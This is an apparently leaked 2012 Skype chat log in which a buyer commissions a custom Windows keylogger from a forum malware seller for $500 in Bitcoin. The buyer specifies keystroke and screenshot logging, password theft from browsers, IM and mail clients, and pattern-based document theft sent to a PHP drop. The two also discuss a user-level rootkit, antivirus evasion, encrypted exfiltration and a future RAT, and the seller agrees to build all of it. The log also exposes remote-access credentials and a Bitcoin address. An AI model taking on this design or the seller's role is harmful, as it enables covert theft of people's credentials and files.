Untitled

a guest Dec 20th, 2012 1,317 Never
  1. [11/26/2012 10:16:04 PM] ' Tweety HF;: Hi shelly.bongo! I’d like to add you on Skype. ' Tweety HF;
  2. [11/26/2012 10:16:04 PM] Shelly Bongo: Shelly Bongo has shared contact details with ' Tweety HF;.
  3. [11/26/2012 10:16:11 PM] Shelly Bongo: hi
  4. [11/26/2012 10:16:20 PM] ' Tweety HF;: Hey.
  5. [11/26/2012 10:16:41 PM] Shelly Bongo: so
  6. [11/26/2012 10:17:07 PM] Shelly Bongo: i'm looking for a stable keylogger combined with recovery of popular apps AND a special file stealer feature
  7. [11/26/2012 10:17:19 PM] ' Tweety HF;: Sure I can do that.
  8. [11/26/2012 10:17:53 PM] Shelly Bongo: are you in any way affiliated with any police, federal or government entity?
  9. [11/26/2012 10:18:10 PM] ' Tweety HF;: Nope.
  10. [11/26/2012 10:18:29 PM] Shelly Bongo: do you have experience writing malware?
  11. [11/26/2012 10:18:33 PM] ' Tweety HF;: Yes.
  12. [11/26/2012 10:18:39 PM] Shelly Bongo: i approached mephobia because of his rep in forums
  13. [11/26/2012 10:18:47 PM] Shelly Bongo: could you link me to some of your work if possible?
  14. [11/26/2012 10:18:54 PM] ' Tweety HF;: I have written an Advanced Worm, Downloader and IRC Bot
  15. [11/26/2012 10:19:06 PM] ' Tweety HF;: My work is strictly private for customers so I have no links.
  16. [11/26/2012 10:19:15 PM] ' Tweety HF;: I can show you some stuff over TV?
  17. [11/26/2012 10:19:21 PM] Shelly Bongo: over TV ?
  18. [11/26/2012 10:19:38 PM] ' Tweety HF;: Teamviewer.
  19. [11/26/2012 10:21:10 PM] Shelly Bongo: i like to keep things segragated, teamviewer is too direct.
  20. [11/26/2012 10:21:16 PM] Shelly Bongo: VNC possible?
  21. [11/26/2012 10:21:21 PM] ' Tweety HF;: Never heard of it lol.
  22. [11/26/2012 10:21:32 PM] Shelly Bongo: ?
  23. [11/26/2012 10:21:38 PM] Shelly Bongo: you have never heard of vnc?
  24. [11/26/2012 10:21:41 PM] ' Tweety HF;: Nope
  25. [11/26/2012 10:21:48 PM] Shelly Bongo: weird.
  26. [11/26/2012 10:22:15 PM] ' Tweety HF;: Teamviewer should be fine. Just use a VPN.
  27. [11/26/2012 10:32:57 PM] Shelly Bongo: okay
  28. [11/26/2012 10:32:59 PM] Shelly Bongo: lets do it
  29. [11/26/2012 10:34:36 PM] ' Tweety HF;: 234 791 527
  30. [11/26/2012 10:34:39 PM] ' Tweety HF;: 6641
  31. [11/26/2012 10:35:33 PM] ' Tweety HF;: I made a crypter a while ago
  32. [11/26/2012 10:35:55 PM] Shelly Bongo: run it plz
  33. [11/26/2012 10:37:09 PM] ' Tweety HF;: Thats the crypter, this is the worm
  34. [11/26/2012 10:37:59 PM] Shelly Bongo: made any trojans/loggers?
  35. [11/26/2012 10:38:12 PM] ' Tweety HF;: This is essentially a trojan
  36. [11/26/2012 10:38:16 PM] ' Tweety HF;: As it makes a backdoor
  37. [11/26/2012 10:38:57 PM] ' Tweety HF;: My most recent malware:
  38. [11/26/2012 10:39:41 PM] ' Tweety HF;: See?
  39. [11/26/2012 10:39:43 PM] ' Tweety HF;: IRC connected
  40. [11/26/2012 10:39:56 PM] Shelly Bongo: yes
  41. [11/26/2012 10:40:08 PM] ' Tweety HF;: this is uploaded exe
  42. [11/26/2012 10:40:41 PM] ' Tweety HF;: it will download and run it hidden
  43. [11/26/2012 10:40:45 PM] ' Tweety HF;: but i will turn hidden off to show you
  44. [11/26/2012 10:42:52 PM] Shelly Bongo: okay i see
  45. [11/26/2012 10:43:16 PM] ' Tweety HF;: My AV stopping the process atm -.-
  46. [11/26/2012 10:43:36 PM] Shelly Bongo: you couldn't FUD it?
  47. [11/26/2012 10:43:48 PM] ' Tweety HF;: It is FUD but i been working on it for a while, avast sent it to their lab
  48. [11/26/2012 10:43:59 PM] ' Tweety HF;: so only 1 detection at the moment lol
  49. [11/26/2012 10:44:05 PM] Shelly Bongo: understood
  50. [11/26/2012 10:44:13 PM] Shelly Bongo: okay, so lets talk details
  51. [11/26/2012 10:44:22 PM] ' Tweety HF;: Sure.
  52. [11/26/2012 10:45:31 PM | Removed 10:45:49 PM] Shelly Bongo: This message has been removed.
  53. [11/26/2012 10:45:54 PM] Shelly Bongo: sec i'll reformat it
  54. [11/26/2012 10:46:30 PM] ' Tweety HF;: ok
  55. [11/26/2012 10:47:26 PM] Shelly Bongo: There is a need for a Windows based keylogger that has the following characteristics:
  56.  
  57. - Log keystrokes
  58.   - Online/offline - stores everything encrypted (e.g. AES-256) in a local hidden file, and deliver the data each X minutes
  59.  
  60. - Recover passwords from popular applications (browsers, IM, etc)
  61.  
  62. - Leak out files
  63.   - Every interval - or X minutes after a computer is idle, the logger should find and send out files matching a certain filename pattern (e.g. documents, presentations, spreadsheets, PDF files) - e.g. starting from the recently opened documents
  64.  
  65. - Delivery should be via HTTP (to a PHP script) - for all delivered data - files/keystrokes/passwords/etc.
  66.  
  67. - It should be stable, not crash (as most bots of the sort do every now and then), be crypt-able (so we can use crypters to make it FUD), and be static - without requiring .Net version X/Y/Z but just work on Windows 32/64
  68.  
  69. I'll need the source code of the end result along with the binaries (builder+ php file used to receive data).
  70. [11/26/2012 10:48:32 PM] ' Tweety HF;: Alright one moment.
  71. [11/26/2012 10:48:36 PM] Shelly Bongo: shoot
  72. [11/26/2012 10:50:05 PM] ' Tweety HF;: So you want me to write it in C?
  73. [11/26/2012 10:50:46 PM] Shelly Bongo: i think .net framework is installed into all windows versions now
  74. [11/26/2012 10:50:52 PM] Shelly Bongo: either 1.1 or 2.0
  75. [11/26/2012 10:50:54 PM] ' Tweety HF;: Yes it is.
  76. [11/26/2012 10:50:55 PM] Shelly Bongo: doesn't have to be C
  77. [11/26/2012 10:50:55 PM] ' Tweety HF;: 2.0
  78. [11/26/2012 10:51:02 PM] ' Tweety HF;: So you wouldnt mind 2.0?
  79. [11/26/2012 10:51:09 PM] Shelly Bongo: let me run some checks
  80. [11/26/2012 10:51:21 PM] ' Tweety HF;: Alright.
  81. [11/26/2012 10:52:19 PM] Shelly Bongo: hmmm seems like XP doesn't have any version installed (in all SPs neither)
  82. [11/26/2012 10:52:54 PM] Shelly Bongo: perhaps it's possible to bundle a .net 2.0 installer in silent mode in case it's not installed?
  83. [11/26/2012 10:52:55 PM] ' Tweety HF;: XP SP 1 has it lol.
  84. [11/26/2012 10:54:05 PM] Shelly Bongo: nope, it's not installed by default.
  85. [11/26/2012 10:54:09 PM] ' Tweety HF;: http://www.microsoft.com/en-us/download/details.aspx?id=16614
  86. [11/26/2012 10:54:12 PM] Shelly Bongo: is the silent installer possible?
  87. [11/26/2012 10:54:14 PM] ' Tweety HF;: It is in the updates.
  88. [11/26/2012 10:54:19 PM] ' Tweety HF;: Yeah I can do a silent installer too.
  89. [11/26/2012 10:54:51 PM] Shelly Bongo: this link shows the SP1 update FOR .net framework, not .net framework FROM the winxp SP1 update..
  90. [11/26/2012 10:54:52 PM] Shelly Bongo: okay
  91. [11/26/2012 10:54:57 PM] Shelly Bongo: so slap the silent installer in
  92. [11/26/2012 10:55:12 PM] ' Tweety HF;: I will code the silent installer in C
  93. [11/26/2012 10:55:35 PM] Shelly Bongo: the builder should support a list of patterns for the files, e.g. "*.ppt, *.pptx, *finance*.*"
  94. [11/26/2012 10:55:42 PM] Shelly Bongo: and steal those
  95. [11/26/2012 10:55:45 PM] ' Tweety HF;: You want a builder too?
  96. [11/26/2012 10:56:14 PM] Shelly Bongo: actually no it's not necessary, source is sufficient, as long as it's coded in an easy to change way
  97. [11/26/2012 10:56:30 PM] ' Tweety HF;: Yes I have clean sources, easy to modify and rebuild.
  98. [11/26/2012 10:56:51 PM] Shelly Bongo: should i expect the end result to spawn out somewhere?
  99. [11/26/2012 10:57:10 PM] Shelly Bongo: meaning, the product of this work, at a future time, leaking out.
  100. [11/26/2012 10:57:24 PM] ' Tweety HF;: Nope. I keep all my clients work 100% private.
  101. [11/26/2012 10:57:28 PM] ' Tweety HF;: I will not keep a copy.
  102. [11/26/2012 10:57:46 PM] Shelly Bongo: you will delete the copy after you send it to me?
  103. [11/26/2012 10:58:03 PM] ' Tweety HF;: Yes.
  104. [11/26/2012 10:58:34 PM] Shelly Bongo: i have worked with suppliers before, the good and the bad, sounds a bit too good to be true, but we'll plow through it.
  105. [11/26/2012 10:59:03 PM] ' Tweety HF;: You can ask around if you like, I am well known and I have satisfied nearly all my clients.
  106. [11/26/2012 11:00:03 PM] Shelly Bongo: about the file stleaer - it should start looking in "Recently Opened Documents", and once it's done search My Documents, and then the HD - the source should have an ordered list of the directories to scan, supprting things like %appdata% etc
  107. [11/26/2012 11:00:27 PM] ' Tweety HF;: Yeah no problem.
  108. [11/26/2012 11:00:28 PM] Shelly Bongo: once a file is found matching a pattern, it should be zipped and uploaded
  109. [11/26/2012 11:00:45 PM] Shelly Bongo: of course we're talking about a filename pattern, not data pattern from within the file
  110. [11/26/2012 11:01:17 PM] ' Tweety HF;: Can you elaborate?
  111. [11/26/2012 11:01:32 PM] Shelly Bongo: i mean, the file stealer should find and match by filenames
  112. [11/26/2012 11:01:40 PM] Shelly Bongo: not by the data within files
  113. [11/26/2012 11:01:48 PM] Shelly Bongo: e.g. it should look at the name of the file rather than its contents
  114. [11/26/2012 11:02:11 PM] ' Tweety HF;: But what is it looking for exactly?
  115. [11/26/2012 11:02:26 PM] Shelly Bongo: [Monday, November 26, 2012 10:55 PM] Shelly Bongo:
  116.  
  117. <<< the builder should support a list of patterns for the files, e.g. "*.ppt, *.pptx, *finance*.*"
  118. [11/26/2012 11:02:36 PM] Shelly Bongo: replace 'builder' with 'source'
  119. [11/26/2012 11:02:36 PM] ' Tweety HF;: Alright I see.
  120. [11/26/2012 11:02:47 PM] Shelly Bongo: okay
  121. [11/26/2012 11:02:49 PM] Shelly Bongo: so
  122. [11/26/2012 11:02:57 PM] Shelly Bongo: file stealer we discussed
  123. [11/26/2012 11:03:02 PM] ' Tweety HF;: Yes
  124. [11/26/2012 11:03:05 PM] Shelly Bongo: keylogger - the regular deal...
  125. [11/26/2012 11:03:09 PM] ' Tweety HF;: mhm.
  126. [11/26/2012 11:03:14 PM] ' Tweety HF;: Screenshots as well yeah?
  127. [11/26/2012 11:03:26 PM] ' Tweety HF;: System info + browser stealers.
  128. [11/26/2012 11:03:49 PM] Shelly Bongo: screenshot - yes, everything should be configurable of course (interval of screenshots, disable, etc)
  129. [11/26/2012 11:04:02 PM] Shelly Bongo: sysinfo - yes
  130. [11/26/2012 11:04:08 PM] ' Tweety HF;: Yes.
  131. [11/26/2012 11:04:13 PM] Shelly Bongo: regarding the stealers - i want more than browsers
  132. [11/26/2012 11:04:22 PM] Shelly Bongo: IM - skype, icq, msn, yahoo
  133. [11/26/2012 11:04:37 PM] Shelly Bongo: outlook/thunderbird
  134. [11/26/2012 11:04:42 PM] ' Tweety HF;: Alright.
  135. [11/26/2012 11:04:59 PM] Shelly Bongo: and browsers - IE, FF, chrome, safari
  136. [11/26/2012 11:05:31 PM] Shelly Bongo: Mephobia probably has all the code ready for that
  137. [11/26/2012 11:05:33 PM] Shelly Bongo: :)
  138. [11/26/2012 11:06:19 PM] ' Tweety HF;: I made previous stealers before so I can provide.
  139. [11/26/2012 11:06:25 PM] Shelly Bongo: great
  140. [11/26/2012 11:06:42 PM] Shelly Bongo: now, how long do you reckon this will take?
  141. [11/26/2012 11:06:52 PM] Shelly Bongo: it should work on Vista/7/XP, 32 & 64
  142. [11/26/2012 11:07:21 PM] ' Tweety HF;: A week at max I think.
  143. [11/26/2012 11:07:27 PM] Shelly Bongo: for the whole thing?
  144. [11/26/2012 11:07:27 PM] ' Tweety HF;: I just need time to test everything.
  145. [11/26/2012 11:07:28 PM] ' Tweety HF;: Yes.
  146. [11/26/2012 11:07:48 PM] ' Tweety HF;: Windows xp/7/8 + 32/64/86 bit architecture
  147. [11/26/2012 11:08:00 PM] ' Tweety HF;: thats 9 OS's all together + Windows Servers.
  148. [11/26/2012 11:08:09 PM] ' Tweety HF;: I can do it.
  149. [11/26/2012 11:08:18 PM] ' Tweety HF;: Is 1 week long enough?
  150. [11/26/2012 11:08:41 PM] Shelly Bongo: there is no strict time pressure for now, so it is fine
  151. [11/26/2012 11:08:48 PM] Shelly Bongo: price?
  152. [11/26/2012 11:10:38 PM] ' Tweety HF;: Well what is your budget?
  153. [11/26/2012 11:11:06 PM] Shelly Bongo: i have exactly $500, in BTC
  154. [11/26/2012 11:12:36 PM] ' Tweety HF;: Wait do you want a ring3 rootkit as well?
  155. [11/26/2012 11:12:45 PM] Shelly Bongo: ring0 you mean.
  156. [11/26/2012 11:12:57 PM] ' Tweety HF;: Ring0 is going to cost you the whole boat
  157. [11/26/2012 11:13:14 PM] Shelly Bongo: what's a ring3 rootkit?
  158. [11/26/2012 11:13:22 PM] ' Tweety HF;: Ring3 is user level.
  159. [11/26/2012 11:13:28 PM] ' Tweety HF;: Ring0 is kernel level
  160. [11/26/2012 11:13:38 PM] Shelly Bongo: yes, how can a rootkit run in user level..
  161. [11/26/2012 11:13:54 PM] ' Tweety HF;: Remember, I write all my sources and do not use any sources apart from the one I write meaning 100% FUD andcustome.
  162. [11/26/2012 11:13:56 PM] ' Tweety HF;: custom*
  163. [11/26/2012 11:14:13 PM] ' Tweety HF;: rootkit can run in user level by exploiting the users privellages
  164. [11/26/2012 11:14:17 PM] Shelly Bongo: obviously, this needs to be a hidden process (e.g. inject itself somewhere), and undetectable
  165. [11/26/2012 11:14:32 PM] ' Tweety HF;: Yes I can do that no problem.
  166. [11/26/2012 11:14:36 PM] Shelly Bongo: this tool should work for non-administrator users
  167. [11/26/2012 11:14:58 PM] ' Tweety HF;: Yeah the ring3 rootkit will hook into system processes and elevate the rights.
  168. [11/26/2012 11:15:28 PM] Shelly Bongo: why do i need the ring3 rootkit here though? at all i mean
  169. [11/26/2012 11:16:00 PM] ' Tweety HF;: ring3 will make it so even non admin users accounts will be infected and hooked to distribute the malware within the system.
  170. [11/26/2012 11:16:36 PM] Shelly Bongo: what's the price with/without it?
  171. [11/26/2012 11:16:48 PM] Shelly Bongo: will adding it increase risk of being detected?
  172. [11/26/2012 11:17:04 PM] ' Tweety HF;: Ring0 rootkits, well private ones are 1-4 grand for the source.
  173. [11/26/2012 11:17:22 PM] ' Tweety HF;: Ring3 is generally round $300-600 depending on if it is FUD
  174. [11/26/2012 11:17:49 PM] ' Tweety HF;: I made a ring3 before and it is still FUD
  175. [11/26/2012 11:17:54 PM] ' Tweety HF;: So I can throw that in their
  176. [11/26/2012 11:18:41 PM] Shelly Bongo: okay
  177. [11/26/2012 11:19:12 PM] Shelly Bongo: i have been scammed by a russian service provider of this sort not long ago
  178. [11/26/2012 11:19:14 PM] ' Tweety HF;: Do you want a custom ring3 or the ring3 I made? It has not been used yet I just made it but did not sell.
  179. [11/26/2012 11:19:18 PM] Shelly Bongo: and do not intend on that happenning again
  180. [11/26/2012 11:19:23 PM] ' Tweety HF;: No problem.
  181. [11/26/2012 11:19:34 PM] Shelly Bongo: so we will need to structure this in a way where i pay most of the some once it is ready
  182. [11/26/2012 11:19:54 PM] ' Tweety HF;: Perfectly fine with me.
  183. [11/26/2012 11:20:02 PM] ' Tweety HF;: I understand how you feel about this kind of stuff.
  184. [11/26/2012 11:21:42 PM] ' Tweety HF;: You need to understand that I, as a freelancer have had many people ask to do work and in the end they find someone else or do not purchase the product in question after all my work goes into it.
  185. [11/26/2012 11:22:37 PM] ' Tweety HF;: 40% now 60% when completed works for you?
  186. [11/26/2012 11:23:02 PM] Shelly Bongo: sorry, i have to go for 20minutes
  187. [11/26/2012 11:23:05 PM] Shelly Bongo: be back later to continue
  188. [11/26/2012 11:23:06 PM] ' Tweety HF;: No problem.
  189. [11/26/2012 11:36:57 PM] Shelly Bongo: back.
  190. [11/26/2012 11:37:32 PM] Shelly Bongo: first of all, we agreed on the contents, delivery time (~week) and price ($500)?
  191. [11/26/2012 11:38:17 PM] ' Tweety HF;: Yes.
  192. [11/26/2012 11:38:20 PM] Shelly Bongo: how soon can you start?
  193. [11/26/2012 11:38:46 PM] ' Tweety HF;: I will start tonight.
  194. [11/26/2012 11:38:48 PM] Shelly Bongo: i pay in Bitcoin, is that a problem?
  195. [11/26/2012 11:39:01 PM] ' Tweety HF;: Unfortunatly it is. Can you pay by LR?
  196. [11/26/2012 11:39:05 PM] Shelly Bongo: no
  197. [11/26/2012 11:39:25 PM] Shelly Bongo: WU is an option, though one I do not like to use
  198. [11/26/2012 11:39:57 PM] ' Tweety HF;: Fee's are disgraceful. I know a legit exchanger that has done over $800 of exchanges with me who can help out.
  199. [11/26/2012 11:39:57 PM] Shelly Bongo: anonymity is important to me.
  200. [11/26/2012 11:39:58 PM] ' Tweety HF;: Interested?
  201. [11/26/2012 11:40:37 PM] Shelly Bongo: i don't understand what you're offering
  202. [11/26/2012 11:40:56 PM] ' Tweety HF;: You pay using BTC to an exchanger and he sends LR to me.
  203. [11/26/2012 11:41:17 PM] ' Tweety HF;: He is staff member on the forums
  204. [11/26/2012 11:41:20 PM] Shelly Bongo: as long as the price remains the same, and you trust the exchanger, fine by me.
  205. [11/26/2012 11:41:35 PM] ' Tweety HF;: Alright.
  206. [11/26/2012 11:41:42 PM] ' Tweety HF;: so 40% is fine?
  207. [11/26/2012 11:41:48 PM] ' Tweety HF;: And 60% when I am done.
  208. [11/26/2012 11:41:49 PM] Shelly Bongo: i was saving this for last
  209. [11/26/2012 11:41:59 PM] Shelly Bongo: 40% of $500 is way too much
  210. [11/26/2012 11:42:41 PM] Shelly Bongo: i can do 10% up front, then add until 40% in 2 days, after you show me progress in TV
  211. [11/26/2012 11:42:49 PM] Shelly Bongo: meaning, show code, show what's the status etc.
  212. [11/26/2012 11:42:53 PM] Shelly Bongo: and the rest when you're done.
  213. [11/26/2012 11:43:53 PM] ' Tweety HF;: Exchangers cost per transfer, the transfer fee will be coming out of my side thats why I wanted to do 40%. Of course if we do it this way you will get daily updates from me. Meph can vouch for my skills as well as delivery.
  214. [11/26/2012 11:44:06 PM] ' Tweety HF;: It seems reasonable to me.
  215. [11/26/2012 11:45:12 PM] Shelly Bongo: i can settle on 25% - i understand your points, however i cannot afford to take risks as i need this budget to get the project done
  216. [11/26/2012 11:45:43 PM] Shelly Bongo: with all due respect to Meph, i've only known him for 1 hour.
  217. [11/26/2012 11:45:59 PM] ' Tweety HF;: Oh.
  218. [11/26/2012 11:46:00 PM] ' Tweety HF;: I see.
  219. [11/26/2012 11:46:09 PM] ' Tweety HF;: http://www.hackforums.net/member.php?action=profile&uid=1234585
  220. [11/26/2012 11:46:12 PM] ' Tweety HF;: My HF profile.
  221. [11/26/2012 11:46:23 PM] ' Tweety HF;: You can go through my rep as well as my threads/posts.
  222. [11/26/2012 11:46:31 PM] ' Tweety HF;: I am not the type of person to let you down.
  223. [11/26/2012 11:48:32 PM] Shelly Bongo: okay, lets do 30% - that's $150 USD
  224. [11/26/2012 11:48:43 PM] ' Tweety HF;: Alright.
  225. [11/26/2012 11:49:36 PM] Shelly Bongo: please provide the BC address to wire this to through your exchanger
  226. [11/26/2012 11:49:57 PM] ' Tweety HF;: How many coins you sending through?
  227. [11/26/2012 11:50:21 PM] Shelly Bongo: i'll check
  228. [11/26/2012 11:50:22 PM] Shelly Bongo: sec
  229. [11/26/2012 11:50:28 PM] ' Tweety HF;: Ok
  230. [11/27/2012 12:03:06 AM] ' Tweety HF;: I'll be back in 15 minutes, dinner.
  231. [11/27/2012 12:17:21 AM] Shelly Bongo: it's going to be 12.x BTCs
  232. [11/27/2012 12:17:40 AM] ' Tweety HF;: Alright.
  233. [11/27/2012 12:17:45 AM] Shelly Bongo: whatever is the rate at the time of transfer (determining the .x)
  234. [11/27/2012 12:17:52 AM] Shelly Bongo: worth of $150 usd
  235. [11/27/2012 12:18:11 AM] ' Tweety HF;: thats $30 for transferring thats coming out of my side.
  236. [11/27/2012 12:18:44 AM] Shelly Bongo: it costs you $30 just to convert it to LR?
  237. [11/27/2012 12:19:03 AM] ' Tweety HF;: Yes.
  238. [11/27/2012 12:19:49 AM] ' Tweety HF;: Address: 16oVdzCKfEBMLobuxuXgg9jKvgRVxTLEAp
  239. [11/27/2012 12:20:36 AM] ' Tweety HF;: [Tuesday, November 27, 2012 12:16 AM] Xch4ng3:
  240.  
  241. <<< 16oVdzCKfEBMLobuxuXgg9jKvgRVxTLEAp
  242. [11/27/2012 12:22:52 AM] Shelly Bongo: got it
  243. [11/27/2012 12:22:59 AM] ' Tweety HF;: Sec.
  244. [11/27/2012 12:23:12 AM] Shelly Bongo: i am loading my BT account, and will transfer the sum as it's ready
  245. [11/27/2012 12:23:20 AM] ' Tweety HF;: Alright.
  246. [11/27/2012 12:30:05 AM] Shelly Bongo: seems like my exchanger is having tech problems, i'll write to you when it works, this happened to me before an it had to be around 8 hours until they fixed it... hope it will be faster
  247. [11/27/2012 1:04:49 AM] Shelly Bongo: okay, expect this to happen tomorrow, it won't happen today
  248. [11/27/2012 1:04:55 AM] ' Tweety HF;: Alright.
  249. [11/27/2012 4:06:39 PM] Shelly Bongo: are you there?
  250. [11/27/2012 7:16:08 PM] ' Tweety HF;: I am online.
  251. [11/27/2012 7:24:31 PM] Shelly Bongo: hi, i'll be here in around 5 hours, if you are around then  i'll make the transfer
  252. [11/27/2012 7:24:42 PM] ' Tweety HF;: Alright.
  253. [11/27/2012 8:52:31 PM] Shelly Bongo: okay, i will send the payment soon - it's the same BT address you gave me yesterday?
  254. [11/27/2012 8:52:39 PM] ' Tweety HF;: Yes.
  255. [11/27/2012 8:53:11 PM] ' Tweety HF;: How many coins?
  256. [11/27/2012 8:54:24 PM] Shelly Bongo: okay, just sent
  257. [11/27/2012 8:54:26 PM] Shelly Bongo: 12.5 BTC
  258. [11/27/2012 8:54:41 PM] Shelly Bongo: under the exchange rate of $12 usd for 1 btc, total $150 usd
  259. [11/27/2012 8:54:48 PM] ' Tweety HF;: Alright just confirming to my exchanger.
  260. [11/27/2012 8:55:46 PM] ' Tweety HF;: Give me a sec I will ring him up now.
  261. [11/27/2012 8:56:03 PM] Shelly Bongo: sure, but wait for it to be confirmed, it will take a few minutes i gather
  262. [11/27/2012 10:22:54 PM] Shelly Bongo: it has been fully verified, what's the status on your end?
  263. [11/27/2012 10:23:30 PM] ' Tweety HF;: My exchanger will be on in in a few hours. I will start on it once it is confirmed.
  264. [11/27/2012 10:23:36 PM] ' Tweety HF;: Also can you send your HF profile link.
  265. [11/27/2012 10:37:18 PM] Shelly Bongo: http://www.hackforums.net/member.php?action=profile&uid=1440454
  266. [11/28/2012 1:15:50 AM] Shelly Bongo: hi?
  267. [11/28/2012 10:29:31 AM] ' Tweety HF;: Sorry I need to run off to work. I have recieved the payment. I am starting on the project as well.
  268. [11/28/2012 9:34:56 PM] ' Tweety HF;: Hi.
  269. [11/28/2012 9:35:03 PM] Shelly Bongo: Hi there
  270. [11/28/2012 9:35:05 PM] Shelly Bongo: how're things?
  271. [11/28/2012 9:35:10 PM] ' Tweety HF;: Been waiting for you all day lol.
  272. [11/28/2012 9:35:21 PM] ' Tweety HF;: I finished the rootkit module.
  273. [11/28/2012 9:35:40 PM] Shelly Bongo: the one you said you already have prepared? (ring3)
  274. [11/28/2012 9:35:42 PM] ' Tweety HF;: I need to work on keyboard hooks and a native processor
  275. [11/28/2012 9:36:04 PM] ' Tweety HF;: Yes but I will be stripping the uneccasry components.
  276. [11/28/2012 9:36:15 PM] Shelly Bongo: good to hear
  277. [11/28/2012 9:36:43 PM] ' Tweety HF;: Also you will need to give it a name.
  278. [11/28/2012 9:37:24 PM] Shelly Bongo: i tried some other 'commercial' loggers, while some are FUD in terms of file scanning, all are easily caught in real-time (execution) - or when they attempt to communicate with the internet
  279. [11/28/2012 9:37:52 PM] ' Tweety HF;: I see.
  280. [11/28/2012 9:38:13 PM] Shelly Bongo: today, for example, AVG Internet Security 2013 caught a 100% FUD (in scan-mode) logger... with some heuristics, and also due to the fact it saw it communicating outbound
  281. [11/28/2012 9:39:02 PM] Shelly Bongo: what are your thoughts on evading such detection?
  282. [11/28/2012 9:39:05 PM] ' Tweety HF;: I can bypass them.
  283. [11/28/2012 9:39:37 PM] Shelly Bongo: do you plan on testing the final product vs. such solutions to ensure it evades them?
  284. [11/28/2012 9:40:14 PM] Shelly Bongo: regarding the name - it has little significance since this is not a product i aim to sell
  285. [11/28/2012 9:40:38 PM] Shelly Bongo: besides, whatever name is given - it can be easily changed in the source
  286. [11/28/2012 9:40:41 PM] Shelly Bongo: so, you give it a name
  287. [11/28/2012 9:40:42 PM] Shelly Bongo: :)
  288. [11/28/2012 9:40:59 PM] ' Tweety HF;: Yes each VM has 3 different AV's which I test under sonar radiars and runtime scanners.
  289. [11/28/2012 9:41:01 PM] ' Tweety HF;: Sure.
  290. [11/28/2012 9:44:05 PM] Shelly Bongo: regarding the delivery mode (to some php script) - can you make sure it supports https?
  291. [11/28/2012 9:44:34 PM] ' Tweety HF;: Why would it need https?
  292. [11/28/2012 9:45:17 PM] Shelly Bongo: files/keystrokes/passwords are delivered to a PHP script i specify
  293. [11/28/2012 9:45:21 PM] Shelly Bongo: remotely
  294. [11/28/2012 9:45:58 PM] Shelly Bongo: i prefer to have the option to work with https://*/upload.php - so anyone with wireshark won't be able to spot what's going on
  295. [11/28/2012 9:46:34 PM] ' Tweety HF;: That wont make any difference because the PHP file I will write for you will have a decode and hashing system with a salt
  296. [11/28/2012 9:46:47 PM] ' Tweety HF;: the data packets will be encrypted BEFORE sent to the php file
  297. [11/28/2012 9:46:51 PM] Shelly Bongo: okay, understood
  298. [11/28/2012 9:46:54 PM] ' Tweety HF;: The php file will decipher it in the server
  299. [11/28/2012 9:46:56 PM] ' Tweety HF;: :)
  300. [11/28/2012 9:46:57 PM] Shelly Bongo: that's better
  301. [11/28/2012 9:47:10 PM] Shelly Bongo: avoid the lag of https.
  302. [11/28/2012 9:47:16 PM | Removed 9:47:26 PM] Shelly Bongo: This message has been removed.
  303. [11/28/2012 9:47:27 PM] ' Tweety HF;: It basically means, if somebody sees the connection they cannot sniff the packets because its all encrypted
  304. [11/28/2012 9:47:33 PM] ' Tweety HF;: Even wireshare cant do anything :)
  305. [11/28/2012 9:47:36 PM] Shelly Bongo: i understand
  306. [11/28/2012 9:48:07 PM] Shelly Bongo: if you don't mind me asking, what sort of thing do you do for work? you wrote to me you're going to work so i reckon you don't write malware for a living
  307. [11/28/2012 9:48:45 PM] ' Tweety HF;: I own an Accident Management company, Car rental company and this winter I will be launching a web development + graphics company.
  308. [11/28/2012 9:48:56 PM] ' Tweety HF;: And I also do freelancing on the side.
  309. [11/28/2012 9:49:07 PM] Shelly Bongo: busy man
  310. [11/28/2012 9:49:32 PM] Shelly Bongo: i was betting - programmer
  311. [11/28/2012 9:49:49 PM] ' Tweety HF;: I am studying Computer Science in University too :P
  312. [11/28/2012 9:51:56 PM] Shelly Bongo: i don't recall if i told you this, but there will be more projects after this one if this is satisfactory, which i hope it will be
  313. [11/28/2012 9:52:10 PM] ' Tweety HF;: Yeah no problem.
  314. [11/28/2012 10:06:13 PM] ' Tweety HF;: ASCII or UTF8 Encoding?
  315. [11/28/2012 10:19:02 PM] Shelly Bongo: utf-8
  316. [11/28/2012 10:19:19 PM] ' Tweety HF;: Alright.
  317. [11/29/2012 12:30:06 AM] ' Tweety HF;: Finishing off the keyboard hook for the keylogger.
  318. [11/29/2012 12:32:16 AM] Shelly Bongo: great
  319. [11/29/2012 12:33:58 AM] ' Tweety HF;: What stealing functions did you want again?
  320. [11/29/2012 12:35:23 AM] Shelly Bongo: IE/FF/Chrome browsers, IMs like Skype/MSN/Google-Talk/Yahoo-M
  321. [11/29/2012 12:36:05 AM] ' Tweety HF;: Do you want spread functions?
  322. [11/29/2012 12:36:36 AM] Shelly Bongo: + outlook, thunderbird
  323. [11/29/2012 12:36:46 AM] Shelly Bongo: no, no need to spread
  324. [11/29/2012 12:37:03 AM] ' Tweety HF;: You sure?
  325. [11/29/2012 12:37:04 AM] Shelly Bongo: sysinfo, screenies
  326. [11/29/2012 12:37:08 AM] ' Tweety HF;: Alright.
  327. [11/29/2012 12:37:18 AM] ' Tweety HF;: So you want it to be as stealthy as possible?
  328. [11/29/2012 12:37:20 AM] Shelly Bongo: by spread you mean copy itself to usb etc. right?
  329. [11/29/2012 12:38:14 AM] Shelly Bongo: 1) fulfill requirements (key/screen-log, steal passwords, steal files)
  330. [11/29/2012 12:38:19 AM] Shelly Bongo: 2) evade AVs
  331. [11/29/2012 12:38:26 AM] Shelly Bongo: 3) be stealthy
  332. [11/29/2012 12:38:31 AM] Shelly Bongo: priority list
  333. [11/29/2012 12:47:11 AM] ' Tweety HF;: Alright no problem.
  334. [11/29/2012 12:47:25 AM] ' Tweety HF;: And yes, It can spread through Facebook/Twitter/USB/Skype etc.
  335. [11/29/2012 12:47:32 AM] ' Tweety HF;: But I understand you want ti to be stealthy.
  336. [11/29/2012 12:53:41 AM] Shelly Bongo: yes, i need it to be stealthy
  337. [11/29/2012 12:55:04 AM] ' Tweety HF;: Alright no spreaders.
  338. [11/29/2012 1:02:59 AM | Edited 1:03:37 AM] Shelly Bongo: this is not relevant for this project but might be for a future one - have you ever made a RAT, or think you're up for such a task - with a C&C server, a nice UI, etc.?
  339. [11/29/2012 1:03:21 AM] Shelly Bongo: i'm talking about the scale of SpyEye in terms of complexity and functionality
  340. [11/29/2012 1:04:00 AM] ' Tweety HF;: Yeah no problem I can do that.
  341. [11/29/2012 1:06:17 AM] Shelly Bongo: from scratch, not based on leaked source of zeus etc., ?
  342. [11/29/2012 1:07:04 AM] ' Tweety HF;: Of course. I never ever use sources.
